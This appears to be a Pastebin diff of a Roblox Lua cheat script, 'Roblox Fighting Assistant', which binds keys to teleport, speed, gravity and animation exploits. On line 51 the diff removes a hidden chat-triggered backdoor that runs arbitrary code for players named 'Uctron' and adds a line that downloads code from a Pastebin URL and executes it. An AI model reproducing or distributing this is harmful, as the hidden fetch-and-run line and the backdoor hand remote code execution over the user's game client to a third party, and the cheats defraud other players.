SHOW:
|
|
- or go back to the newest paste.
1 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("/me has loaded Roblox Fighting Assistant", "All") | |
2 | plr = game.Players.LocalPlayer | |
3 | mouse = plr:GetMouse() | |
4 | mouse.KeyDown:connect(function(key) | |
5 | if key == "e" then | |
6 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + Vector3.new(0,10,0) | |
7 | end | |
8 | end) | |
9 | plr = game.Players.LocalPlayer | |
10 | mouse = plr:GetMouse() | |
11 | mouse.KeyDown:connect(function(key) | |
12 | if key == "q" then | |
13 | game.Players.LocalPlayer.Character.Humanoid.JumpPower = 250 | |
14 | game.Players.LocalPlayer.Character.Humanoid:ChangeState(3) | |
15 | workspace.Gravity = 1000 | |
16 | wait(.625) | |
17 | workspace.Gravity = 196.2 | |
18 | game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50 | |
19 | end | |
20 | end) | |
21 | plr = game.Players.LocalPlayer | |
22 | mouse = plr:GetMouse() | |
23 | mouse.KeyDown:connect(function(key) | |
24 | if key == "r" then | |
25 | game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = math.random(25,45) | |
26 | wait(math.random(.45,.55)) | |
27 | game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16 | |
28 | end | |
29 | end) | |
30 | plr = game.Players.LocalPlayer | |
31 | mouse = plr:GetMouse() | |
32 | mouse.KeyDown:connect(function(key) | |
33 | if key == "t" then | |
34 | _=wait | |
35 | AnimationId="188632011" | |
36 | A=Instance.new("Animation") | |
37 | A.AnimationId = "rbxassetid://"..AnimationId | |
38 | k=game:GetService("Players").LocalPlayer.Character:FindFirstChild("Humanoid"):LoadAnimation(A) | |
39 | for i=1,math.random(6,9) do | |
40 | k:Play() | |
41 | k:AdjustSpeed(50/20) | |
42 | _(7.03125/50) | |
43 | end | |
44 | h = game.Players.LocalPlayer.Character.Humanoid | |
45 | tracks = h:GetPlayingAnimationTracks() | |
46 | for _,x in pairs(tracks) | |
47 | do x:Stop() | |
48 | end | |
49 | end | |
50 | end) | |
51 | - | local User if game.Players:FindFirstChild("Uctron") then User = "Uctron" elseif game.Players:FindFirstChild("Uctron2") then User = "Uctron2" else end function has(a,b)a=a or"Sample Text"b=b or"Sample"if string.match(a,b)and true or false then return true else return false end end;game.Players[User].Chatted:connect(function(message)if has(message:lower(),"s ")then message=message:gsub("s ","")loadstring(message)()end end) |
51 | + | loadstring(game:HttpGet(('https://pastebin.com/raw/zhSJRqrw'),true))() |
52 | local Input = game:GetService("UserInputService") | |
53 | local Plr = game.Players.LocalPlayer | |
54 | local Mouse = Plr:GetMouse() | |
55 | function To(position) | |
56 | local Chr = Plr.Character | |
57 | if Chr ~= nil then | |
58 | Chr:MoveTo(position) | |
59 | end | |
60 | end | |
61 | Input.InputBegan:Connect(function(input) | |
62 | if input.UserInputType == Enum.UserInputType.MouseButton1 and Input:IsKeyDown(Enum.KeyCode.LeftControl) then | |
63 | To(Mouse.Hit.p) | |
64 | end | |
65 | end) |